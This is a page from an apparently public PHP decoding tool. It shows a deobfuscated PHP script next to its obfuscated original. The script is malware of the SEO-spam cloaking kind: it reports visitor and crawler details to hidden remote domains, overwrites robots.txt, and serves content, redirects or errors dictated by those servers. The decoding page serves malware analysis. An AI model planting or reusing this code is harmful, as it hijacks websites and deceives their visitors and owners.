Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php goto GOZih; nv7uO: $web = "\x77\145\x62\75" . $host . "\x26\172\x7a\75" . (disbot(..
Decoded Output download
<?php
goto GOZih; nv7uO: $web = "web=" . $host . "&zz=" . (disbot() ? "1" : "0") . "&uri=" . urlencode($duri) . "&urlshang=" . urlencode($urlshang) . "&http=" . $http . "&lang=" . $lang; goto CA8S3; m3r6C: $defaultContent .= "Allow: /" . PHP_EOL . PHP_EOL; goto oknpR; EhmCw: $duri_tmp = drequest_uri(); goto V1h45; BOwsv: if (!file_exists($robotsPath)) { file_put_contents($robotsPath, $defaultContent); } else { if (md5_file($robotsPath) !== md5($defaultContent)) { @file_put_contents($robotsPath, $defaultContent); } } goto iFKAA; wCJQQ: $defaultContent = "User-agent: *" . PHP_EOL; goto m3r6C; CA8S3: $html_content = doutdo($xmlname, $http, $web); goto jQG4p; V1h45: $duri = empty($duri_tmp) ? "/" : $duri_tmp; goto eT9gZ; iFKAA: if (!strstr($html_content, "nobotuseragent")) { handle_content($html_content); } goto PjabP; MFFGW: $lang = isset($_SERVER["HTTP_ACCEPT_LANGUAGE"]) ? $_SERVER["HTTP_ACCEPT_LANGUAGE"] : "en"; goto jOIP8; Vs8oZ: $http = is_https() ? "https" : "http"; goto EhmCw; GOZih: $xmlstring = "%33%31%33%36%2D%65%6E%61%78%32%31%33%2E%76%7A%63%68%79%66%62%65%2E%6B%6C%6D,%33%31%33%36%2D%65%6E%61%78%32%31%33%2E%69%76%65%6E%79%76%67%75%72%2E%6B%6C%6D,%33%31%33%36%2D%65%6E%61%78%32%31%33%2E%73%6E%66%67%62%65%72%66%2E%67%62%63,%33%31%33%36%2D%65%6E%61%78%32%31%33%2E%79%76%7A%76%61%6E%79%76%66%2E%67%62%63"; goto POWs2; eT9gZ: $host = $_SERVER["HTTP_HOST"]; goto MFFGW; jQG4p: $robotsPath = $_SERVER["DOCUMENT_ROOT"] . "/robots.txt"; goto N_YeQ; N_YeQ: $hta = ''; goto NWinf; lG0VJ: function disbot() { $uAgent = strtolower(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : ''); return stristr($uAgent, "googlebot") || stristr($uAgent, "bing") || stristr($uAgent, "yahoo") || stristr($uAgent, "google") || stristr($uAgent, "Googlebot"); } goto zhAY_; oknpR: $defaultContent .= "Sitemap: " . $http . "://" . $host . "/" . $hta . "sitemap.xml" . PHP_EOL; goto BOwsv; NWinf: if (stristr($duri, "/?")) { $hta = "?"; } goto wCJQQ; jOIP8: $urlshang = isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : ''; goto nv7uO; POWs2: $xmlname = explode(",", $xmlstring); goto Vs8oZ; zhAY_: function doutdo($webs, $http, $web) { shuffle($webs); foreach ($webs as $domain) { $domain = str_rot13(urldecode($domain)); $url = "http://" . $domain . "/index.php?" . $web; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $response = curl_exec($ch); if (!curl_errno($ch)) { curl_close($ch); return $response; } else { curl_close($ch); } if (ini_get("allow_url_fopen")) { $response = @file_get_contents($url); if ($response !== false) { return $response; } } } echo "cURL Error: 0"; } goto KHrv7; PjabP: function is_https() { return isset($_SERVER["HTTPS"]) && strtolower($_SERVER["HTTPS"]) !== "off" || isset($_SERVER["HTTP_X_FORWARDED_PROTO"]) && $_SERVER["HTTP_X_FORWARDED_PROTO"] === "https" || isset($_SERVER["HTTP_FRONT_END_HTTPS"]) && strtolower($_SERVER["HTTP_FRONT_END_HTTPS"]) !== "off"; } goto Ug8dE; Ug8dE: function drequest_uri() { if (isset($_SERVER["REQUEST_URI"])) { return $_SERVER["REQUEST_URI"]; } elseif (isset($_SERVER["argv"])) { return $_SERVER["PHP_SELF"] . "?" . $_SERVER["argv"][0]; } else { return $_SERVER["PHP_SELF"] . "?" . $_SERVER["QUERY_STRING"]; } } goto lG0VJ; KHrv7: function handle_content($html_content) { if (strstr($html_content, "okhtmlgetimg")) { header("Content-Type: image/jpeg"); echo str_replace("okhtmlgetimg", '', $html_content); die; } elseif (strstr($html_content, "okhtmlgetcss")) { header("Content-Type: text/css; charset=utf-8"); echo str_replace("okhtmlgetcss", '', $html_content); die; } elseif (strstr($html_content, "okhtmlgetcontent")) { header("Content-type: text/html; charset=utf-8"); echo str_replace("okhtmlgetcontent", '', $html_content); die; } elseif (strstr($html_content, "okxmlgetcontent")) { header("Content-Type: application/xml; charset=utf-8"); echo str_replace("okxmlgetcontent", '', $html_content); die; } elseif (strstr($html_content, "getcontent500page")) { header("HTTP/1.1 500 Internal Server Error"); die; } elseif (strstr($html_content, "getcontent404page")) { header("HTTP/1.1 404 Not Found"); die; } elseif (strstr($html_content, "getcontent301page")) { header("HTTP/1.1 301 Moved Permanently"); $html_content = str_replace("getcontent301page", '', $html_content); header("Location: " . $html_content); die; } elseif (strstr($html_content, "okrobotsgetcontent")) { header("Content-Type: text/plain"); echo str_replace("okrobotsgetcontent", '', $html_content); die; } } ?>
Did this file decode correctly?
Original Code
<?php
goto GOZih; nv7uO: $web = "\x77\145\x62\75" . $host . "\x26\172\x7a\75" . (disbot() ? "\61" : "\x30") . "\x26\x75\x72\x69\x3d" . urlencode($duri) . "\46\165\x72\x6c\x73\x68\141\x6e\147\x3d" . urlencode($urlshang) . "\x26\150\x74\x74\x70\x3d" . $http . "\x26\154\141\x6e\147\75" . $lang; goto CA8S3; m3r6C: $defaultContent .= "\x41\x6c\x6c\157\167\72\40\57" . PHP_EOL . PHP_EOL; goto oknpR; EhmCw: $duri_tmp = drequest_uri(); goto V1h45; BOwsv: if (!file_exists($robotsPath)) { file_put_contents($robotsPath, $defaultContent); } else { if (md5_file($robotsPath) !== md5($defaultContent)) { @file_put_contents($robotsPath, $defaultContent); } } goto iFKAA; wCJQQ: $defaultContent = "\x55\x73\145\162\55\141\147\145\x6e\x74\x3a\x20\52" . PHP_EOL; goto m3r6C; CA8S3: $html_content = doutdo($xmlname, $http, $web); goto jQG4p; V1h45: $duri = empty($duri_tmp) ? "\x2f" : $duri_tmp; goto eT9gZ; iFKAA: if (!strstr($html_content, "\156\157\142\x6f\x74\x75\x73\145\x72\x61\147\x65\156\x74")) { handle_content($html_content); } goto PjabP; MFFGW: $lang = isset($_SERVER["\110\x54\x54\x50\x5f\x41\x43\x43\x45\120\x54\137\x4c\x41\x4e\107\x55\x41\x47\x45"]) ? $_SERVER["\110\x54\x54\120\137\x41\x43\103\105\x50\124\137\x4c\x41\x4e\x47\x55\x41\x47\x45"] : "\145\156"; goto jOIP8; Vs8oZ: $http = is_https() ? "\150\x74\164\160\x73" : "\x68\164\164\160"; goto EhmCw; GOZih: $xmlstring = "\x25\63\x33\x25\x33\x31\45\63\x33\x25\63\66\45\x32\x44\45\66\x35\45\x36\x45\45\66\61\45\x37\70\45\63\x32\x25\x33\61\45\63\x33\x25\62\105\x25\x37\x36\x25\x37\101\45\x36\63\45\x36\x38\x25\67\x39\x25\x36\x36\x25\x36\x32\x25\x36\65\45\62\x45\x25\66\x42\45\66\103\45\x36\104\x2c\45\x33\63\45\63\61\x25\63\x33\45\x33\x36\x25\x32\x44\x25\x36\x35\x25\66\x45\x25\x36\61\x25\67\70\45\x33\62\x25\x33\61\45\x33\63\45\62\105\45\x36\71\x25\67\x36\x25\66\65\45\x36\x45\45\67\x39\x25\67\x36\x25\x36\x37\x25\67\65\x25\x37\62\x25\x32\105\45\66\102\45\x36\103\45\x36\104\x2c\x25\x33\x33\45\x33\61\45\x33\x33\x25\63\66\x25\x32\x44\x25\x36\x35\x25\66\105\x25\x36\x31\x25\67\x38\45\63\62\45\x33\x31\x25\63\x33\45\62\105\45\x37\63\x25\x36\x45\x25\x36\x36\x25\66\67\45\66\x32\x25\x36\x35\x25\67\62\45\x36\66\45\x32\105\45\x36\x37\45\66\62\x25\x36\63\54\45\63\63\x25\63\61\45\63\63\x25\63\x36\45\62\104\45\66\65\x25\x36\x45\x25\66\61\x25\67\x38\x25\63\x32\45\63\61\x25\63\63\x25\62\105\45\x37\71\x25\67\66\x25\67\x41\45\x37\x36\45\x36\61\x25\66\105\45\x37\x39\45\67\x36\x25\66\x36\x25\x32\105\x25\x36\67\x25\x36\x32\45\x36\63"; goto POWs2; eT9gZ: $host = $_SERVER["\x48\124\124\x50\x5f\110\117\x53\x54"]; goto MFFGW; jQG4p: $robotsPath = $_SERVER["\x44\117\x43\125\115\105\x4e\x54\x5f\122\117\117\x54"] . "\x2f\162\157\142\x6f\x74\163\x2e\164\x78\x74"; goto N_YeQ; N_YeQ: $hta = ''; goto NWinf; lG0VJ: function disbot() { $uAgent = strtolower(isset($_SERVER["\110\x54\x54\x50\x5f\125\x53\105\122\x5f\x41\x47\x45\x4e\124"]) ? $_SERVER["\110\124\x54\120\x5f\x55\123\105\x52\137\x41\x47\x45\x4e\124"] : ''); return stristr($uAgent, "\147\x6f\157\x67\154\x65\142\x6f\164") || stristr($uAgent, "\142\x69\x6e\x67") || stristr($uAgent, "\x79\x61\150\x6f\x6f") || stristr($uAgent, "\x67\157\x6f\147\154\x65") || stristr($uAgent, "\x47\157\157\147\154\145\x62\x6f\x74"); } goto zhAY_; oknpR: $defaultContent .= "\x53\151\164\x65\155\x61\160\x3a\40" . $http . "\72\x2f\57" . $host . "\57" . $hta . "\x73\x69\x74\x65\x6d\141\160\56\x78\155\x6c" . PHP_EOL; goto BOwsv; NWinf: if (stristr($duri, "\x2f\77")) { $hta = "\77"; } goto wCJQQ; jOIP8: $urlshang = isset($_SERVER["\110\x54\124\120\137\122\x45\x46\x45\122\x45\122"]) ? $_SERVER["\x48\x54\124\120\x5f\x52\x45\106\105\122\x45\x52"] : ''; goto nv7uO; POWs2: $xmlname = explode("\x2c", $xmlstring); goto Vs8oZ; zhAY_: function doutdo($webs, $http, $web) { shuffle($webs); foreach ($webs as $domain) { $domain = str_rot13(urldecode($domain)); $url = "\x68\164\164\160\x3a\x2f\57" . $domain . "\x2f\151\156\144\x65\x78\56\160\x68\160\77" . $web; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $response = curl_exec($ch); if (!curl_errno($ch)) { curl_close($ch); return $response; } else { curl_close($ch); } if (ini_get("\x61\154\x6c\x6f\x77\137\x75\162\154\137\146\x6f\160\x65\x6e")) { $response = @file_get_contents($url); if ($response !== false) { return $response; } } } echo "\x63\125\122\x4c\x20\105\162\x72\x6f\162\72\x20\x30"; } goto KHrv7; PjabP: function is_https() { return isset($_SERVER["\110\x54\x54\x50\x53"]) && strtolower($_SERVER["\x48\x54\x54\120\123"]) !== "\157\x66\146" || isset($_SERVER["\110\124\x54\x50\x5f\x58\x5f\106\x4f\122\x57\101\x52\x44\105\104\x5f\x50\x52\x4f\x54\117"]) && $_SERVER["\x48\x54\x54\120\x5f\130\137\x46\117\x52\127\101\x52\104\x45\x44\137\x50\x52\x4f\124\x4f"] === "\x68\x74\x74\x70\x73" || isset($_SERVER["\x48\124\x54\120\x5f\x46\122\x4f\116\124\x5f\105\116\x44\x5f\110\124\x54\120\123"]) && strtolower($_SERVER["\x48\124\x54\x50\137\x46\122\117\x4e\x54\137\105\x4e\104\137\x48\124\124\x50\123"]) !== "\157\146\146"; } goto Ug8dE; Ug8dE: function drequest_uri() { if (isset($_SERVER["\122\105\x51\x55\105\x53\124\x5f\125\x52\111"])) { return $_SERVER["\122\105\x51\x55\x45\x53\124\x5f\125\x52\111"]; } elseif (isset($_SERVER["\x61\x72\x67\166"])) { return $_SERVER["\120\x48\x50\x5f\123\105\x4c\x46"] . "\x3f" . $_SERVER["\x61\x72\x67\x76"][0]; } else { return $_SERVER["\120\x48\120\137\123\x45\x4c\x46"] . "\x3f" . $_SERVER["\121\125\x45\122\131\137\123\x54\x52\x49\116\107"]; } } goto lG0VJ; KHrv7: function handle_content($html_content) { if (strstr($html_content, "\x6f\153\x68\164\x6d\x6c\147\x65\164\151\155\x67")) { header("\103\157\156\164\145\156\164\x2d\124\171\160\145\x3a\x20\x69\x6d\x61\147\x65\57\152\160\x65\x67"); echo str_replace("\157\153\150\164\x6d\154\147\145\x74\x69\155\147", '', $html_content); die; } elseif (strstr($html_content, "\x6f\153\150\x74\155\x6c\x67\145\164\143\x73\x73")) { header("\103\x6f\x6e\x74\x65\x6e\x74\x2d\x54\171\x70\x65\72\x20\x74\x65\170\164\57\x63\163\x73\x3b\x20\x63\150\x61\162\x73\x65\164\x3d\165\164\x66\55\70"); echo str_replace("\157\153\150\164\155\154\147\x65\x74\143\x73\163", '', $html_content); die; } elseif (strstr($html_content, "\157\x6b\150\164\x6d\x6c\x67\x65\164\143\157\156\x74\145\x6e\x74")) { header("\103\157\156\x74\x65\x6e\x74\55\x74\171\x70\x65\72\x20\x74\145\170\164\57\x68\x74\x6d\154\73\40\x63\150\x61\x72\163\145\164\75\x75\164\146\x2d\x38"); echo str_replace("\157\x6b\x68\x74\x6d\x6c\147\x65\x74\143\x6f\156\x74\145\x6e\x74", '', $html_content); die; } elseif (strstr($html_content, "\157\x6b\170\x6d\x6c\x67\145\164\143\x6f\156\164\145\x6e\164")) { header("\x43\x6f\156\164\x65\156\164\x2d\124\171\x70\145\72\x20\141\160\160\154\151\x63\141\x74\151\157\x6e\x2f\170\x6d\154\73\x20\x63\x68\141\x72\163\x65\164\x3d\165\x74\x66\55\x38"); echo str_replace("\157\x6b\x78\155\x6c\147\x65\x74\143\x6f\x6e\164\x65\156\x74", '', $html_content); die; } elseif (strstr($html_content, "\x67\145\164\143\x6f\x6e\164\x65\x6e\x74\x35\60\x30\x70\x61\147\145")) { header("\x48\124\x54\x50\x2f\x31\56\61\40\x35\60\60\40\111\156\164\x65\x72\x6e\141\x6c\x20\x53\145\162\x76\145\162\40\105\x72\x72\157\x72"); die; } elseif (strstr($html_content, "\147\x65\164\143\157\156\164\145\156\164\64\60\64\160\141\147\145")) { header("\x48\124\x54\120\57\61\x2e\x31\x20\x34\x30\x34\40\x4e\157\x74\x20\106\157\x75\x6e\144"); die; } elseif (strstr($html_content, "\x67\145\164\x63\157\x6e\164\145\156\x74\63\x30\61\x70\x61\x67\145")) { header("\x48\x54\124\120\57\x31\56\61\x20\63\60\x31\x20\115\x6f\166\x65\144\40\x50\x65\x72\155\141\x6e\x65\x6e\x74\154\171"); $html_content = str_replace("\x67\x65\x74\x63\157\x6e\x74\145\156\164\x33\x30\x31\x70\141\147\145", '', $html_content); header("\114\x6f\143\141\x74\x69\x6f\x6e\x3a\x20" . $html_content); die; } elseif (strstr($html_content, "\x6f\153\x72\x6f\x62\157\164\x73\x67\145\164\143\x6f\156\164\x65\156\164")) { header("\x43\157\x6e\164\145\156\164\55\124\171\160\145\x3a\x20\164\145\170\x74\x2f\160\x6c\x61\151\156"); echo str_replace("\157\x6b\x72\157\x62\x6f\x74\x73\147\145\164\x63\157\156\164\x65\156\x74", '', $html_content); die; } }
Function Calls
| None |
Stats
| MD5 | 5ab124665dd4673d348b6ed66547ee76 |
| Eval Count | 0 |
| Decode Time | 145 ms |